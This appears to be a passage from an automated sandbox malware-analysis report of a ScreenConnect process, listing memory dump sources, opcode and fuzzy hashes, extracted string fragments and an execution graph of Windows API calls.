                                                                        • Opcode Fuzzy Hash: 9b22aacf3f30c2c8114ee354d1caab95935ce2a08a99508444772240f7780f51
                                                                        • Instruction Fuzzy Hash: 5031F677B08A69DAD310F77CF8665FD3B60EF8527B70400B7E1C88A1A3E815548983D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2644436026.00007FFB10080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10080000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10080000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 329cd771521cf8cdb5e90bfdfe809999040b5bbc3af7f8f3dec31ad5842d7ea2
                                                                        • Instruction ID: ca0cd51f8abee18c9d19df9a06f57f775ac9b8e733f6967f7a629de5dbedaca8
                                                                        • Opcode Fuzzy Hash: 329cd771521cf8cdb5e90bfdfe809999040b5bbc3af7f8f3dec31ad5842d7ea2
                                                                        • Instruction Fuzzy Hash: 0231C6A2E08D5D4FEB94EA6C8459ABD77D2EF98790B440176E00ED339ADE149C018780
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2644436026.00007FFB10080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10080000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10080000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ea9535013b447610af2986f6aa6a50164b785efb220640db2c3483064915702c
                                                                        • Instruction ID: 3a69da989f69988c1b74ddf9d8bfc5595ffef35c785b34b47ea7adaa7e78e98d
                                                                        • Opcode Fuzzy Hash: ea9535013b447610af2986f6aa6a50164b785efb220640db2c3483064915702c
                                                                        • Instruction Fuzzy Hash: 0721F2A3D1C94D8FE740E67CE85A0FDBFA2FF542A1F6440B7D408C7296EE246A064780
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2644436026.00007FFB10080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10080000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10080000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6fc65c03d636dff5ebd342db19c724a23e1d94e7344c7486d81f8991e1697491
                                                                        • Instruction ID: 1627b9d4157a943b323c3073d1872447118db59d697557b0a4c5c9c8f7146ef9
                                                                        • Opcode Fuzzy Hash: 6fc65c03d636dff5ebd342db19c724a23e1d94e7344c7486d81f8991e1697491
                                                                        • Instruction Fuzzy Hash: EF2101A3D1C95E8BE740E678A86A0FDBBA1FF64261F6000B3D448C7286EE2459414780
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2644436026.00007FFB10080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10080000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10080000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c5283e8fdb898439a8cec1f76e4266ed7caf46555a3f8dc7b1045bfde7283a48
                                                                        • Instruction ID: d2e5772ebf8d9c033d25a7825ce514932ab74da9aadc1a604c3787b196c577d3
                                                                        • Opcode Fuzzy Hash: c5283e8fdb898439a8cec1f76e4266ed7caf46555a3f8dc7b1045bfde7283a48
                                                                        • Instruction Fuzzy Hash: FCF0BE3160890D8FCF44EF2CD8499FABBF0EFA9322B10056BE518D7120CA219594CBC1
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2644436026.00007FFB10080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10080000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10080000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 81cb242e166de8d7540cac10f833b294ac6c38b5eee14047f51fbccbd8b6669a
                                                                        • Instruction ID: 43d48ff66c03f3b73baf386364cc0b21a071c14a82f0547df9e790718d78f617
                                                                        • Opcode Fuzzy Hash: 81cb242e166de8d7540cac10f833b294ac6c38b5eee14047f51fbccbd8b6669a
                                                                        • Instruction Fuzzy Hash: E5F0BE32A4895D8ECF00FB6CE459AEEBB74EF59329B0400EBE148CA162E620948487D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2644436026.00007FFB10080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10080000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10080000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3dc71d0cd7158cad42c9aa3cd61e0f18aace1ac1059b013d27707462ad3a6b7e
                                                                        • Instruction ID: 2d2b2d9027ae81acefd96828a3387094dedd0348f28be2326abb7ef41dd51d09
                                                                        • Opcode Fuzzy Hash: 3dc71d0cd7158cad42c9aa3cd61e0f18aace1ac1059b013d27707462ad3a6b7e
                                                                        • Instruction Fuzzy Hash: 18E02B25E1CD2C1AE764B23DA4092F97186FF443A1F000277F40DC228DEC15291402D1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2644436026.00007FFB10080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10080000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10080000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: L_^($L_^4$L_^F$L_^H$L_^J$L_^\$L_^^
                                                                        • API String ID: 0-881138260
                                                                        • Opcode ID: ab3a63c46c09b71056d23544d0c87fb4685747b5787298a23411c033bdd320ac
                                                                        • Instruction ID: f84984e23761476d50276a231b197fc478c1687589489854afe23103f36ae44d
                                                                        • Opcode Fuzzy Hash: ab3a63c46c09b71056d23544d0c87fb4685747b5787298a23411c033bdd320ac
                                                                        • Instruction Fuzzy Hash: 05212CF3548A09EA9302BB7DF8912FD3794EF9423570490F2F2588F107EE1828CA86C5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2644436026.00007FFB10080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10080000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10080000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: M_^$"K$#S$$[$%c$&k
                                                                        • API String ID: 0-3847040968
                                                                        • Opcode ID: c8222fb84a6ae44462f60b1ce680a612cfc780bdaa58742c8007eb37d71a1c53
                                                                        • Instruction ID: 5a835b97bf22effc418d50ad3d1f784cf2b4512a4c9db6e2ac8859dfc2ae0a86
                                                                        • Opcode Fuzzy Hash: c8222fb84a6ae44462f60b1ce680a612cfc780bdaa58742c8007eb37d71a1c53
                                                                        • Instruction Fuzzy Hash: BD512457B49E2ED5DA01B67CF4A11FC7380FF95372B1043B3E145CE18B9D49A88692E4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2644436026.00007FFB10080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10080000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_7ffb10080000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: M_^$"K$#S$$[$%c$&k
                                                                        • API String ID: 0-3847040968
                                                                        • Opcode ID: 437dff733ef2e494f5873ede6465ed952239e5d1ff7e2c145f901595f1acc370
                                                                        • Instruction ID: a70a0ee3431647f3795180e790424d29eef9279f389c599571a7e5f56d8f78ce
                                                                        • Opcode Fuzzy Hash: 437dff733ef2e494f5873ede6465ed952239e5d1ff7e2c145f901595f1acc370
                                                                        • Instruction Fuzzy Hash: D4511453A49E2ED6DB01B67CF4A11FC7380FF95372B1042B3E145CE18BAD58A88292D5

                                                                        Execution Graph

                                                                        Execution Coverage:13.4%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:15
                                                                        Total number of Limit Nodes:0
                                                                        execution_graph 17525 7ffb10426f0d 17526 7ffb10426f1f 17525->17526 17527 7ffb10427004 CallWindowProcW 17526->17527 17528 7ffb10426f72 17526->17528 17527->17528 17538 7ffb1041ef90 17539 7ffb1041ef9f LoadLibraryExW 17538->17539 17541 7ffb1041f03b 17539->17541 17529 7ffb10422614 17530 7ffb1042263e CreateWindowExW 17529->17530 17532 7ffb104226fc 17530->17532 17533 7ffb1041e405 17535 7ffb1041e41b 17533->17535 17534 7ffb1041e4a1 17535->17534 17536 7ffb1041e739 GetModuleHandleW 17535->17536 17537 7ffb1041e76d 17536->17537

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1520516890.00007FFB10410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10410000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10410000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6m$ ".m
                                                                        • API String ID: 0-1693057919
                                                                        • Opcode ID: 5f36ad080d843135a6b714b1c9384ac10f579a4de97aeb6ac0b8e6a9459388f4
                                                                        • Instruction ID: f59ec185b097b4e29cdba25aa4a4144ab5ec340370ff4a7e124288144f245fdb
                                                                        • Opcode Fuzzy Hash: 5f36ad080d843135a6b714b1c9384ac10f579a4de97aeb6ac0b8e6a9459388f4
                                                                        • Instruction Fuzzy Hash: 8FD105B0908E4A8FE769DB39C4953A57BE2FF59360F04417AC089C7692DB38B8558740

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 450 7ffb10426f0d-7ffb10426f60 453 7ffb1042704b-7ffb1042706b 450->453 454 7ffb10426f66-7ffb10426f70 450->454 462 7ffb1042706e-7ffb10427082 453->462 455 7ffb10426f72-7ffb10426fbd 454->455 456 7ffb10426fda-7ffb10427031 CallWindowProcW 454->456 464 7ffb10426fbf 455->464 465 7ffb10426fc5-7ffb10426fd5 455->465 460 7ffb10427033 456->460 461 7ffb10427039-7ffb10427049 456->461 460->461 461->462 464->465 465->462
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1520516890.00007FFB10410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10410000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10410000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CallProcWindow
                                                                        • String ID:
                                                                        • API String ID: 2714655100-0
                                                                        • Opcode ID: 702004bcf395ad3667dbc146acb1381238cd61b9968859c82734f9358bb4ce37
                                                                        • Instruction ID: 8781034f3f84c9ab6b4c6f2bb83f55c19176e3f8928df17172522efb1b0d0dea
                                                                        • Opcode Fuzzy Hash: 702004bcf395ad3667dbc146acb1381238cd61b9968859c82734f9358bb4ce37
                                                                        • Instruction Fuzzy Hash: 4051BE7060CB498FDBA9DF2CD4856697BF0FF69310F0406AED48AC7692CB74A815CB91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 647 7ffb10422614-7ffb104226fa CreateWindowExW 650 7ffb104226fc 647->650 651 7ffb10422702-7ffb1042274c call 7ffb10422765 647->651 650->651 656 7ffb1042274e 651->656 657 7ffb10422753-7ffb10422764 651->657 656->657
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1520516890.00007FFB10410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10410000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10410000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 2d9f46e879ee8b43e3d795e4a035b75ce1d6d5d5a72414701523de0c03a360b1
                                                                        • Instruction ID: a720bcab2a9a764bf45711575ab2f5ba18fceae1b94f088a5ae2750fb66337fe
                                                                        • Opcode Fuzzy Hash: 2d9f46e879ee8b43e3d795e4a035b75ce1d6d5d5a72414701523de0c03a360b1
                                                                        • Instruction Fuzzy Hash: 47410C70A0CA188FDBA8DB58D845BA8B7F1FB58711F1082DED04DE3251CB71A9858F81

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 658 7ffb1041ef90-7ffb1041eff5 661 7ffb1041efff-7ffb1041f039 LoadLibraryExW 658->661 662 7ffb1041eff7-7ffb1041effc 658->662 663 7ffb1041f03b 661->663 664 7ffb1041f041-7ffb1041f069 661->664 662->661 663->664
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1520516890.00007FFB10410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10410000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10410000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: f18413cdbdd8b4b710089eab7f55e959ea7bd788cfe071e2a6f6b3cac02ef951
                                                                        • Instruction ID: 33de998b4c2b0992ef9ea0ab32cdc44d3ca0bf909ec667729b3df71903d611a5
                                                                        • Opcode Fuzzy Hash: f18413cdbdd8b4b710089eab7f55e959ea7bd788cfe071e2a6f6b3cac02ef951
                                                                        • Instruction Fuzzy Hash: F131B77190CB588FDB28EBACD84A6F97BF0EB55321F04416FD04AD3252DB74A856C782

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 728 7ffb10422600-7ffb10422604 729 7ffb10422606-7ffb1042260f 728->729 730 7ffb10422685-7ffb104226fa CreateWindowExW 728->730 729->730 731 7ffb104226fc 730->731 732 7ffb10422702-7ffb1042274c call 7ffb10422765 730->732 731->732 737 7ffb1042274e 732->737 738 7ffb10422753-7ffb10422764 732->738 737->738
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1520516890.00007FFB10410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10410000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10410000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: f8dc802dec2795e1b679776d8985b8a2ca30270920f7f7310fd23c4c3c6e550c
                                                                        • Instruction ID: 4b633177763cf2877f67de3d1dbb2358fd7729dd4eab8c17b4d8a44c0e9e2551
                                                                        • Opcode Fuzzy Hash: f8dc802dec2795e1b679776d8985b8a2ca30270920f7f7310fd23c4c3c6e550c
                                                                        • Instruction Fuzzy Hash: 9331A271A0CB598FEBA4EB58D8457A8F7F1FB99321F0081EED04DD3251CA74A9858F81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1510170831.00007FFB10070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10070000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10070000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: /m
                                                                        • API String ID: 0-777800384
                                                                        • Opcode ID: 356e49f98e014344605157edde43521f22be35da02037afb8dd66814fd956e84
                                                                        • Instruction ID: 7abecc32cdfc7cc24f9c682ed34eec917cb33da02cfcda794ada58f1ed47164e
                                                                        • Opcode Fuzzy Hash: 356e49f98e014344605157edde43521f22be35da02037afb8dd66814fd956e84
                                                                        • Instruction Fuzzy Hash: 8D51E7A2A1CD4D4FD7A4D63CC859A7577E2FF68360B5401BBD04DC329BED28AC458381
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1510170831.00007FFB10070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10070000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10070000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: b4m
                                                                        • API String ID: 0-2183738599
                                                                        • Opcode ID: 8ddeeeb6efcf48bad47f9c9035f3cba9bfa1561dcaff6d854457a565fd2f234b
                                                                        • Instruction ID: 2c66c97832b1dcc14ae993b4e78b8775eabefc273e1b11cf27b33c9e9c286797
                                                                        • Opcode Fuzzy Hash: 8ddeeeb6efcf48bad47f9c9035f3cba9bfa1561dcaff6d854457a565fd2f234b
                                                                        • Instruction Fuzzy Hash: 1681B4B0908A4A8FDB48DB68C4596ADBBE1FF59350F5405BDE04EC7396DE38A841CB81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1510170831.00007FFB10070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10070000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10070000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: /m
                                                                        • API String ID: 0-777800384
                                                                        • Opcode ID: 1e7dc9a6640210c4949a698df081596512f85ae2865af673806f686bacdb9391
                                                                        • Instruction ID: e6a092c9a8b49166d4b65ed0eda712b64795f0793114bcbb34aea690cd8c9a2c
                                                                        • Opcode Fuzzy Hash: 1e7dc9a6640210c4949a698df081596512f85ae2865af673806f686bacdb9391
                                                                        • Instruction Fuzzy Hash: 5751B261B1CD0D4FEA94EB2CD899B6977D2FF68360B5401BAE44DC339ADD28EC418781
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1510170831.00007FFB10070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10070000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10070000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: P:/m
                                                                        • API String ID: 0-3802830192
                                                                        • Opcode ID: b29edea78eb3af9e10f5c660124d67f9182d2b36bf9ce81062def461ff4a25ee
                                                                        • Instruction ID: 3fbc13a43368a27fa1b30e64ca19cca12beb8234c36d4a4ec9ec3bcdbe7568c6
                                                                        • Opcode Fuzzy Hash: b29edea78eb3af9e10f5c660124d67f9182d2b36bf9ce81062def461ff4a25ee
                                                                        • Instruction Fuzzy Hash: 37F02862A5CE8D4FD799E23894556E57792FFA9220B4802BAD08BC6186ED0C9C428381
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1510170831.00007FFB10070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10070000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10070000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e4fd15457e1bbbbde858cc5d41e6eef56bb22c983c233e824c3c2bc8d2dac9a
                                                                        • Instruction ID: d624adf560954d556d973b7353deffd8100c445a4a6f1aa11ae3549cda9a0707
                                                                        • Opcode Fuzzy Hash: 3e4fd15457e1bbbbde858cc5d41e6eef56bb22c983c233e824c3c2bc8d2dac9a
                                                                        • Instruction Fuzzy Hash: 72B133B2A0DE4ACBE764E73CD4696F977D1EF41375B14047AD0CAC7297EE28A8428740
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1510170831.00007FFB10070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10070000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10070000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 40fa11eb2b9b0964ffbf257fe14e0624085bd7a3f1e0b406bff937dcea9b98e3
                                                                        • Instruction ID: 9e66c815a88c9435418d0f5fdc5b7daf44fd47c6419a3087b034257c8410202b
                                                                        • Opcode Fuzzy Hash: 40fa11eb2b9b0964ffbf257fe14e0624085bd7a3f1e0b406bff937dcea9b98e3
                                                                        • Instruction Fuzzy Hash: 5631E377B08A6DEAD310F63CF8655FD7B60EF9523B70442F7E1888A0A3EC15548982D5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1510170831.00007FFB10070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10070000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10070000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4396581b3c7b346f976f1d016ca0c82f68e02dd480c58ab07ca3802f96627746
                                                                        • Instruction ID: 5853fcc9d6f104242bdfd5c9dc430ed85c45458776a71b9ecad89ad4718c0dfd
                                                                        • Opcode Fuzzy Hash: 4396581b3c7b346f976f1d016ca0c82f68e02dd480c58ab07ca3802f96627746
                                                                        • Instruction Fuzzy Hash: EC31B4A2E18D0D4FEB98E66C9459AB977E2FF98750B550177E00DD339ADE249C018780
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1510170831.00007FFB10070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10070000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10070000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a815c1ffa41827f4e3a36b35261213b9e7fd577c1febf3aa867b9321684714a3
                                                                        • Instruction ID: 5d26161ae7e7429815c4db7838326a063b098517964a7a4744e5aca51f27ace1
                                                                        • Opcode Fuzzy Hash: a815c1ffa41827f4e3a36b35261213b9e7fd577c1febf3aa867b9321684714a3
                                                                        • Instruction Fuzzy Hash: 292107A3D4C95D8FE744E63CD85A0FDBBE2EF54261F1041B6D44DC7246ED3869428780
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1510170831.00007FFB10070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10070000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10070000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2e95de11c8fc368b356b1c9afb3e8efb1a476f14c8ffd47952bed130875e948d
                                                                        • Instruction ID: 8d4871206bf72d468d32725024eb4db77b84c64a54a715371aa82733ff4b68d9
                                                                        • Opcode Fuzzy Hash: 2e95de11c8fc368b356b1c9afb3e8efb1a476f14c8ffd47952bed130875e948d
                                                                        • Instruction Fuzzy Hash: DA2123A2D48A5E8BE784E63CD8690FCBBE1FF58261F5041B6D44DC7286EE3869418780
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1510170831.00007FFB10070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10070000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10070000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d440a53f4e7af0cd6af7c2e7ddcfd52cb356f779a9634e156fd3bcc6198ab694
                                                                        • Instruction ID: 414096d18ad43f609ca635ab7971e0eab6d24a24ed34a610815bca00c3dfa408
                                                                        • Opcode Fuzzy Hash: d440a53f4e7af0cd6af7c2e7ddcfd52cb356f779a9634e156fd3bcc6198ab694
                                                                        • Instruction Fuzzy Hash: 33F0B43160890D8FCF44EF6CD8499EABBF0EFA9322B10056BE608D7120CA209594CBC0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1510170831.00007FFB10070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10070000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10070000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1103c4ac6dc71f53e0b33c2fb581c8a953d52ce6be69002f130882e42cfbb423
                                                                        • Instruction ID: 1d443eca79a173795c4995969b107a451daea3873a6db1a80406996d70d61500
                                                                        • Opcode Fuzzy Hash: 1103c4ac6dc71f53e0b33c2fb581c8a953d52ce6be69002f130882e42cfbb423
                                                                        • Instruction Fuzzy Hash: C6F0B43294895D8ECB00FB6CE455AEE7B74EF59325B0400EBE148CB051D510548487D1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1510170831.00007FFB10070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10070000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10070000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: M_^($M_^4$M_^F$M_^H$M_^J$M_^\$M_^^
                                                                        • API String ID: 0-386917737
                                                                        • Opcode ID: 51b66dd9a4200a51b3f78648ad5078152b5ca55c73d38413176b5f7ba0ae2312
                                                                        • Instruction ID: f04391d8089306bd5121349c0d62f502fe663670040fb7c8fdd50b531374d863
                                                                        • Opcode Fuzzy Hash: 51b66dd9a4200a51b3f78648ad5078152b5ca55c73d38413176b5f7ba0ae2312
                                                                        • Instruction Fuzzy Hash: 0F213AF3548A19EA9302BB3CE8912ED3794AF5427578142F2E068CF087BD1868868685
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1510170831.00007FFB10070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10070000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10070000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: N_^$"K$#S$$[$%c$&k
                                                                        • API String ID: 0-2829397935
                                                                        • Opcode ID: 7c8f3e62c903e1d5c26742f47370bee9a982a82139ce4ab0965c8e555fb340f2
                                                                        • Instruction ID: 0f3fea5cba7800e81b23a7652442c3323a4d9eaa6cfff51d9bd75088775ba6c3
                                                                        • Opcode Fuzzy Hash: 7c8f3e62c903e1d5c26742f47370bee9a982a82139ce4ab0965c8e555fb340f2
                                                                        • Instruction Fuzzy Hash: F5511957B48E3AD6D601B2BCF4A12FDA780FF943B77004077E285CE08B9D58A88693D5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1510170831.00007FFB10070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB10070000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ffb10070000_ScreenConnect.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: N_^$"K$#S$$[$%c$&k
                                                                        • API String ID: 0-2829397935
                                                                        • Opcode ID: 724abdeb674d371f81ddedb2a4935581cd59445281e430acfc968aeef80aa696
                                                                        • Instruction ID: 46fa569199fdbf0f48068af41bf6f0a86e884b60c2871548d649ce64f7db15af
                                                                        • Opcode Fuzzy Hash: 724abdeb674d371f81ddedb2a4935581cd59445281e430acfc968aeef80aa696
                                                                        • Instruction Fuzzy Hash: 6E512853B48E7AD6D601B2BCF4A12FDA7C0FF943B67004077E285CE18B9D58A88293D5